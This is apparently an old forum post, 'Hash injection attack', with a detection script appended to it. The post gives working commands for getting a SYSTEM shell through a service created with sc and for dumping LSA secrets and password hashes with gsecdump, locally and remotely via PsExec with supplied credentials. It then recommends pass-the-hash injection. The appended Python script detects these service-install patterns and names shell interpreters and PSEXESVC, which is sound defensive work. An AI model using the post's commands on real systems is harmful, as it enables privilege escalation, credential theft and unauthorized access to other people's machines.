
Hash injection attack

Original poster, posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hash information just captured with gsecdump into the local lsass process and carry out a hash injection attack. The foreigners really are impressive; administrators are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, don't actually need to be cracked at all; this is purely a matter of using the tools. As the original article puts it well, whether the password is 4 characters or 127 characters, once you have the hash you can get in 100%.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
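The post above relies on two things a defender can see in the System event log: a freshly created service whose binary is cmd.exe (the "sc create ... type= interact" trick) and PsExec's own service, which it installs to run commands as SYSTEM. The following detection script is an added example written for this page; it is not code from the post, from truesec or from Sysinternals. It runs over a constructed, normalized sample of "service installed" events (Windows Event ID 7045); the field names (service_name, image_path, service_type, account) are this example's own schema rather than the raw Windows XML, and the rules flag a service binary that is a command interpreter, a service marked interactive, and PsExec's default service name PSEXESVC.

```python
import re

# Constructed sample of normalized System-log "service installed" records
# (Event ID 7045). The dict keys are this example's own schema, not the
# raw Windows event XML; values are invented for illustration.
SAMPLE_EVENTS = [
    {"event_id": 7045, "service_name": "shellcmdline",
     "image_path": r"C:\WINDOWS\system32\cmd.exe /K start",
     "service_type": "user mode service (interactive)", "account": "LocalSystem"},
    {"event_id": 7045, "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe",
     "service_type": "user mode service", "account": "LocalSystem"},
    {"event_id": 7045, "service_name": "Spooler",
     "image_path": r"C:\WINDOWS\system32\spoolsv.exe",
     "service_type": "user mode service", "account": "LocalSystem"},
    # A service state-change event (7036) carries no install data and is ignored.
    {"event_id": 7036, "service_name": "shellcmdline",
     "image_path": "", "service_type": "", "account": ""},
]

# Service binaries that are really command interpreters: a service whose
# ImagePath starts a shell is almost never a legitimate install.
SHELL_RE = re.compile(r"\b(cmd|powershell|pwsh|wscript|cscript)\.exe\b", re.IGNORECASE)

# PsExec installs its helper service under this default name.
PSEXEC_RE = re.compile(r"^PSEXESVC", re.IGNORECASE)


def classify(event):
    """Return the list of reasons a service-install event looks suspicious.

    An empty list means the event did not match any rule. Only Event ID 7045
    (service installed) records are examined; other IDs return no reasons.
    """
    reasons = []
    if event.get("event_id") != 7045:
        return reasons
    if SHELL_RE.search(event.get("image_path", "")):
        reasons.append("service binary is a command interpreter")
    if "interact" in event.get("service_type", "").lower():
        reasons.append("service flagged interactive")
    if PSEXEC_RE.match(event.get("service_name", "")):
        reasons.append("PsExec default service name")
    return reasons


def scan(events):
    """Return (service_name, reasons) for every event that matched a rule."""
    hits = []
    for event in events:
        reasons = classify(event)
        if reasons:
            hits.append((event["service_name"], reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_EVENTS):
        print(f"{name}: {'; '.join(reasons)}")
```

In practice the records would come from the System log (via Get-WinEvent or a SIEM forwarder) rather than the inline sample, and a create/start/delete sequence for the same short-lived service name within seconds, as in the post's transcript, is a further signal worth correlating on top of these per-event rules.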